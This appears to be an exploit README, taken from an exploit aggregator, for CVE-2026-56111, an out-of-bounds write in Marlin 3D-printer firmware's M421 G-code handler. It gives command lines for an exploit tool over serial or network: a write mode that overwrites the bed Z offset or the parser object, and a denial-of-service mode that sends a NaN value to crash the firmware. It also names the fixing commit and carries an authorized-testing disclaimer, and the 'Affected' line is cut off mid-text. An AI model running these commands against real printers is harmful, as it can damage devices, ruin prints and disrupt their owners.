## https://sploitus.com/exploit?id=75711BFE-8B18-55AC-A70F-7ACF021EFAE2
# CVE-2026-56111 - Marlin M421 Out-of-bounds Write
Proof of concept for **CVE-2026-56111**, an out-of-bounds write in the `M421` G-code
handler of [Marlin Firmware](https://github.com/MarlinFirmware/Marlin) when built with
`MESH_BED_LEVELING`.
- Advisory: https://www.vulncheck.com/advisories/marlin-firmware-out-of-bounds-write-via-m421-g-code-handler
- Affected: Marlin ` for USB, e.g. `/dev/ttyUSB0` or `/dev/ttyACM0`
(add `--baud N` if needed; many boards use `250000`)
- `--tcp ` for printers exposing telnet/network gcode, e.g. `192.168.1.50:23`
### write mode
Send `M421` with the index and value you choose:
```
./exp --serial /dev/ttyUSB0 write -i 3 -j 0 -z 99.0
./exp --tcp 192.168.1.50:23 write -i 5 -j 0 -z 99.0
```
On a default 3x3 grid (valid index 0..2):
- `-i 3 -j 0` writes at offset 36 bytes, which is `z_offset` (the bed Z offset)
- `-i 5 -j 0` writes at offset 60 bytes, which is the parser object
### dos mode
Send an out-of-range index with a NaN Z value. The NaN propagates into the motion math
and reliably crashes or hangs the firmware:
```
./exp --serial /dev/ttyUSB0 dos
./exp --tcp 192.168.1.50:23 dos
```
## Fix
Update to a Marlin build that includes commit `1f255d1`, which bounds the indices the
same way the ABL and UBL handlers already do.
## Disclaimer
For research and authorized testing only. Use only on devices you own or have explicit
permission to test. Sending these commands can crash a printer or disrupt a print.